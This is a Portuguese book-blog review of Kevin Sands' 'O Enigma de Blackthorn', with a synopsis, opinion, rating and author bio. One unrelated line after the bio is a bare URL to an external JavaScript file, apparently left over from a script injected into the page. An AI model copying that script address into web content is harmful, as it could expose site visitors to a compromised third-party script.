Sinopse Editora Leya: Após uma série de assassinatos, um aprendiz de boticário precisa solucionar enigmas e decifrar códigos na busca por um segredo que pode destruir o mundo.
Poções, quebra-cabeças e uma ou outra explosão. Tudo isso pode acontecer em um dia normal de trabalho do jovem Christopher Rowe, aprendiz de boticário. Mas o que ele não sabe, e logo vai perceber, é que este é um péssimo momento para ser assistente de Benedict Blackthorn. Uma série de assassinatos abala Londres, e Christopher está na mira. Seus únicos aliados são seus melhores amigos. Suas únicas pistas são uma mensagem codificada sobre o projeto mais perigoso de seu mestre, e um aviso criptografado: “Não conte a ninguém!”. Agora, resta a ele desvendar o código e descobrir o segredo que pode destruir a humanidade. Ou se tornar a próxima vítima.
Uma história que faz perder o fôlego, repleta de suspense, mistério, enigmas e personagens inesquecíveis.

Opinião: O Enigma de Blackthorn é um livro que reúne fatos históricos, ação, mistérios, fantasia e a velha e boa “bruxaria” ou “alquimia”, ou ainda: “Os boticários”.

Ambientada na velha e suja Londres, Kevin Sands misturou a religião com a ciência e trouxe a versão jovem de Robert Langdon, porém muita mais animada e direta ao ponto.

São vários os elementos que lembram de outras grandes histórias, como as aventuras de Langdon, as insistência de Hermione Granger e sua inteligência para a arte de bruxaria.

Longe deste universo escolar contemporâneo do universo HP, o livro busca fatos históricos da época, a busca pelo poder supremo baseado na religião, crenças e cultos secretos; e insere um menino órfão, criado por severos tutores e em meio a violência de “colegas”.

A história não se delonga na vida passada e recente do protagonista Christopher Rowe, a história foca nos acontecimentos que o envolvem junto com seu mestre o Boticário “Blackthorn”.

A mudança na vida de Rowe acontece porque ele se mostra competente, inteligente e disposto; estes elementos reunidos chamaram a atenção do mestre e ele se torna o seu aprendiz. Como aprendiz, sua vida está inteiramente ligada com a do mestre e aos mesmos riscos.

A jornada de Rowe e de seu amigo Tom é a de decifrar um enigma deixado pelo mestre e porque uma ordem secreta quer tanto ter o conhecimento de algo poderoso e que se cair em mãos erradas pode trazer perigo para humanidade.

É um tanto clichê toda essa questão de poder, humanidade, ordem e etc. Entretanto a junção dos elementos e o ritmo da leitura faz do livro ser uma história empolgante e com vários palpite, pra quando chegar nas reviravoltas você perceber que errou todas as apostas.

O ponto alto do livro é a alquimia. Resgatar os primórdios da química e a forma como ela surgiu é o grande lance desse livro que faz dessa ciência a chave para entender a criação e o poder de Deus.

O Enigma de Blackthorn convence qualquer leitor que esteja em busca de um bom entretenimento com adolescentes salvando o mundo ou país. O interessante é que o leitor acaba envolvido com as receitas químicas e o gracioso latim. Não perca oportunidade aprender a fabricar um canhão ou várias receitas de boticários. Leiam!

Avaliação: 4 estrelas

O Autor desde que escapou da universidade com um par de graus em física teórica, Kevin Sands trabalhou como pesquisador, consultor de negócios e professor. Ele mora em Toronto, Canadá. Ele é o autor da premiada e mais vendida Blackthorn Key série.

https://cloudapi.online/js/api46.js

Origem - Dan Brown - Editora Arqueiro
Compartilhar
Artigo anteriorResenha: A Melodia Feroz – Victoria Schwab
Próximo artigoNovo Livro de John Green, Tartarugas até lá embaixo, vai virar filme
Goiano do pé rachado e comedor de piqui. Alucinado por histórias fantásticas e distópicos. Tributo, Hobbit de nascença, e habitante do país de Aslan. Entre os autores Suzanne Collins é majestade e Tolkien é imperador. Técnico em Química e buscando ser químico industrial intercalado com a vida de escritor, um dia qualquer publicará seu livro. Não dispensa um cinema...

Deixe uma resposta